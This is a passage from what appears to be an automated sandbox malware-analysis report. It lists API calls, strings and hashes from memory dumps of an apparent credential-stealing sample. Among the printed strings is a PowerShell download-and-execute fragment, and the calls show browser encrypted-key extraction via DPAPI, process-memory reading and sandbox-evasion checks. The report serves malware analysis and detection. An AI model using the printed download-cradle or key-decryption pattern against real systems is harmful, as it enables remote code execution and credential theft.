                                      • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction ID: 4eba9d1d14b7e52f985fd76335a568c68ecf85d009518ed0c22cbb0629050a39
                                      • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction Fuzzy Hash: DC31E5B8A0020DEFDB14CF94D995BEE77F9EB49700F108158E955A7290C778AA81CFA1
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                      • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                      • Opcode Fuzzy Hash: 41a9ac40214c004258481c146167ca84ac173594ef3507387ebcdc5aa67caad4
                                      • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                      APIs
                                      • __getptd.LIBCMT ref: 0092CC51
                                        • Part of subcall function 0092C206: __getptd_noexit.LIBCMT ref: 0092C209
                                        • Part of subcall function 0092C206: __amsg_exit.LIBCMT ref: 0092C216
                                      • __amsg_exit.LIBCMT ref: 0092CC71
                                      • __lock.LIBCMT ref: 0092CC81
                                      • InterlockedDecrement.KERNEL32(?), ref: 0092CC9E
                                      • free.MSVCRT ref: 0092CCB1
                                      • InterlockedIncrement.KERNEL32(0042B980), ref: 0092CCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                      • Instruction ID: e35be359d6b597ba1d16abfd6755cab65e655725dede6bf15ac9269d0be67842
                                      • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                      • Instruction Fuzzy Hash: 240122B2A01B34EBCB20EF64B44575C73A4FF60710F004526ECA867298CB346841DFD9
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C9EA
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __amsg_exit.LIBCMT ref: 0041CA0A
                                      • __lock.LIBCMT ref: 0041CA1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                      • free.MSVCRT ref: 0041CA4A
                                      • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                      • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                      • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                      • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                      APIs
                                      • strlen.MSVCRT ref: 00927186
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00927401,00000000,00420BA8,00000000,00000000), ref: 009271B4
                                        • Part of subcall function 00926E37: strlen.MSVCRT ref: 00926E48
                                        • Part of subcall function 00926E37: strlen.MSVCRT ref: 00926E6C
                                      • VirtualQueryEx.KERNEL32(00927574,00000000,?,0000001C), ref: 009271F9
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00927401), ref: 0092731A
                                        • Part of subcall function 00927047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0092705F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: d8a576c68421a355cebd1b78687e9aad41ade11aa9a19d2652e3e5ec5fa2e481
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: 885106B1E0411AEBDB04CFD8E981AEFB7B5BF88300F108519F915A7244D734AE11DBA5
                                      APIs
                                      • strlen.MSVCRT ref: 00416F1F
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                      • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                        • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: *n@$*n@
                                      • API String ID: 1029625771-193229609
                                      • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                      • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                      APIs
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 00924A42
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                      • lstrcat.KERNEL32(?,00000000), ref: 00924A68
                                      • lstrcat.KERNEL32(?,?), ref: 00924A87
                                      • lstrcat.KERNEL32(?,?), ref: 00924A9B
                                      • lstrcat.KERNEL32(?,0064A284), ref: 00924AAE
                                      • lstrcat.KERNEL32(?,?), ref: 00924AC2
                                      • lstrcat.KERNEL32(?,0064A2C8), ref: 00924AD6
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 00928FF7: GetFileAttributesA.KERNEL32(00000000,?,00911DBB,?,?,0042565C,?,?,00420E1F), ref: 00929006
                                        • Part of subcall function 009247D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009247E7
                                        • Part of subcall function 009247D7: RtlAllocateHeap.NTDLL(00000000), ref: 009247EE
                                        • Part of subcall function 009247D7: wsprintfA.USER32 ref: 0092480D
                                        • Part of subcall function 009247D7: FindFirstFileA.KERNEL32(?,?), ref: 00924824
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction ID: 0b5b8dc23dcddbd85894fb93e95b85e03abf89b2015735c0b43438dfb44fb899
                                      • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction Fuzzy Hash: 4A3192B6A40218ABDB10FBF0DC85FEE737DAB98700F4045C9B24596085EEB49789CF95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                      • ')", xrefs: 00412CB3
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                      • <, xrefs: 00412D39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                      • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                      • Opcode Fuzzy Hash: 5f8ae31bfa9754787a169228238118935e8d59a2c42068384eb8c8c7280cf3ad
                                      • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009114A5
                                      • __aulldiv.LIBCMT ref: 009114BF
                                      • __aulldiv.LIBCMT ref: 009114CD
                                      • ExitProcess.KERNEL32 ref: 009114FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: a0982554323418f0c93f1e859fdd642f890f02253d06f8728faa2e3b024abe8b
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: ED016DB0A4130CBAEF10DBD0DC89B9DBB79AB50B05F208458F705772D0D7B49581CB55
                                      APIs
                                      • memcmp.MSVCRT(?,00421264,00000003), ref: 0091A094
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 00920CC7: memset.MSVCRT ref: 00920E83
                                        • Part of subcall function 00920CC7: lstrcat.KERNEL32(?,00000000), ref: 00920E9C
                                        • Part of subcall function 00920CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00920EAE
                                        • Part of subcall function 00920CC7: lstrcat.KERNEL32(?,00000000), ref: 00920EC4
                                        • Part of subcall function 00920CC7: lstrcat.KERNEL32(?,00420D80), ref: 00920ED6
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • memcmp.MSVCRT(?,00421114,00000003), ref: 0091A116
                                      • memset.MSVCRT ref: 0091A14F
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0091A1A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @
                                      • API String ID: 1977917189-2766056989
                                      • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction ID: 64ce1bd7107cd02ad1fc4c9d4aef28e80478ce5cf7ef3d44073f13f41f3e23c2
                                      • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction Fuzzy Hash: 32616A31600258EFCB14EFA4DD96FED7775AF84300F408118F909AB596DB746E85CB46
                                      APIs
                                      • strtok_s.MSVCRT ref: 00410DB8
                                      • strtok_s.MSVCRT ref: 00410EFD
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009A94C0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                      • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                      • Opcode Fuzzy Hash: d0f1ba5d55cb1b253890ed9ee11e6a313e4eedd3fb9c312bac6e1a9e739fb82b
                                      • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                        • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                        • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                        • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 3731072634-738592651
                                      • Opcode ID: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                      • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                      • Opcode Fuzzy Hash: b97104fd662995cfad6d6c7205974953a7702af5bf03f7cdde88330e3a2931d4
                                      • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValidmemset
                                      • String ID:
                                      • API String ID: 703783727-0
                                      • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction ID: cd9835d212fd4a6cb396e302989a14703f24b361972e5855bbb1221653bfd0b6
                                      • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction Fuzzy Hash: AD313AB0A042B19ED725CF34EC953BDBFA49F45310B1845BAD881CF19AC338C845D761
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00926BD3
                                      • sscanf.NTDLL ref: 00926C00
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00926C19
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00926C27
                                      • ExitProcess.KERNEL32 ref: 00926C41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction ID: f35d1fa68f856211af8075585fbccabad515a3451e1b20a37be43df8965264c2
                                      • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction Fuzzy Hash: EF21EDB6D04219AFCF08EFE4E9459EEB7B6FF48300F04852DE506A3254EB345604CB65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092809E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009280A5
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 009280C5
                                      • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 009280E6
                                      • RegCloseKey.ADVAPI32(?), ref: 009280F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: c3c6ce40510743617891a52e8e5dcc13814ab5a0a64d16329ab40e32c24c1150
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: AB114FB5A84219FFD710CFD4ED4AFBBB7B9EB05710F104119F615A7280CB7968018BA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                      • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,009D76B0,00000000,00020119,?), ref: 00417E5E
                                      • RegQueryValueExA.ADVAPI32(?,009DB9C0,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0092799B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009279A2
